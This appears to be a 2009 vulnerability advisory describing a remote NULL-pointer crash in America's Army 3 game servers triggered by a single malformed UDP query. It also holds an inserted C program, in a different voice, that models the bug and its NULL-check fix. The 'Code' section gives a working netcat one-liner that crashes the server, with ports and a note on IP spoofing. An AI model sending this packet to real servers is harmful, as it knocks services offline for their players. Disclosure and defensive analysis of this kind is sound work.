#######################################################################

                             Luigi Auriemma

Application:  America's Army 3
              http://www.americasarmy.com/aa3.php
Versions:     <= 3.0.4
Platforms:    Windows
Bug:          NULL pointer
Exploitation: remote, versus server
Date:         06 Jul 2009
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

America's Army 3 (AA3) is the new free game of the AA series, developed for the U.S. Army as an aid to military recruitment. Released about 20 days ago, it is already played by thousands of players on more than 400 online servers (http://login.aa3.americasarmy.com/servers).

#######################################################################

======
2) Bug
======

Unlike the older versions, AA3 has introduced a new proprietary query type used for retrieving information from the servers. The reply received from a server is compressed and contains a lot of information (including the IP addresses of the connected clients... mah).

The parsing of such queries is performed by the acpu_decompile function in libaa3.dll, which returns a pointer to a newly allocated structure that is then used internally by the game. Using an invalid query type (for example one which doesn't start with the 0x6fe1 value) it is possible to force this function to fail: it returns a NULL pointer instead of the pointer to the new data, and because the caller performs no check on the result, the entire server crashes.

Only one single UDP packet is needed to exploit the vulnerability, so there are no limitations and the attacker can also spoof his own IP address.
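As an added illustration, and not code from this advisory or from libaa3.dll, the following C program models the bug class described above: a hypothetical decompile_query() stands in for acpu_decompile, fails closed by returning NULL on a malformed datagram, and is then called once in the unchecked way (the crash pattern) and once in the hardened way (the fix pattern). The 16-bit little-endian wire encoding of the 0x6fe1 magic, the structure layout and the sample packets are all assumptions constructed here for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumption: the query magic 0x6fe1 travels as a 16-bit little-endian value. */
#define AA3_QUERY_MAGIC 0x6fe1u

/* Hypothetical decoded query; the real structure returned by acpu_decompile is unknown. */
typedef struct {
    uint16_t magic;
    uint8_t  type;
    size_t   payload_len;
    uint8_t  payload[64];
} aa3_query_t;

/* Stand-in for acpu_decompile: parses one datagram into a freshly allocated
 * structure, or returns NULL when the packet is too short or the magic is wrong. */
aa3_query_t *decompile_query(const uint8_t *pkt, size_t len)
{
    if (pkt == NULL || len < 3)
        return NULL;
    uint16_t magic = (uint16_t)(pkt[0] | (pkt[1] << 8));
    if (magic != AA3_QUERY_MAGIC)
        return NULL;                          /* "blah\n" ends up here */

    aa3_query_t *q = calloc(1, sizeof *q);
    if (q == NULL)
        return NULL;
    q->magic = magic;
    q->type  = pkt[2];
    q->payload_len = len - 3;
    if (q->payload_len > sizeof q->payload)
        q->payload_len = sizeof q->payload;   /* truncate, never overflow */
    memcpy(q->payload, pkt + 3, q->payload_len);
    return q;
}

/* The pattern the advisory describes: the result is used without a NULL check.
 * Feed this a packet that does not start with the magic and the process dies. */
int handle_query_unchecked(const uint8_t *pkt, size_t len)
{
    aa3_query_t *q = decompile_query(pkt, len);
    int type = q->type;                       /* NULL dereference on bad input */
    free(q);
    return type;
}

/* Hardened caller: a NULL result means "malformed datagram, drop it and keep serving". */
int handle_query_checked(const uint8_t *pkt, size_t len)
{
    aa3_query_t *q = decompile_query(pkt, len);
    if (q == NULL)
        return -1;                            /* reject instead of crashing */
    int type = q->type;
    free(q);
    return type;
}

int main(void)
{
    /* Constructed sample datagrams (not captured traffic). */
    const uint8_t good[] = { 0xe1, 0x6f, 0x05, 'a', 'b', 'c' };   /* magic 0x6fe1, type 5 */
    const uint8_t bad[]  = "blah\n";                              /* what the PoC sends */

    printf("good packet, checked handler:   type %d\n", handle_query_checked(good, sizeof good));
    printf("good packet, unchecked handler: type %d\n", handle_query_unchecked(good, sizeof good));
    printf("bad packet,  checked handler:   %d (dropped)\n", handle_query_checked(bad, 5));
    /* handle_query_unchecked(bad, 5) is deliberately not called: it would segfault. */
    return 0;
}
```

The only difference between the two handlers is the single NULL test; that is the whole fix, and it is the check a caller of any fallible parser owes the code that runs after it.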
#######################################################################

===========
3) The Code
===========

  echo blah | nc SERVER 39300 -v -v -u

Note: LAN servers use port 9002 instead.

#######################################################################

======
4) Fix
======

No fix.
I have released an unofficial fix for the latest server version known at the moment I'm writing:

  http://aluigi.org/patches/aa3blahfix.lpatch

#######################################################################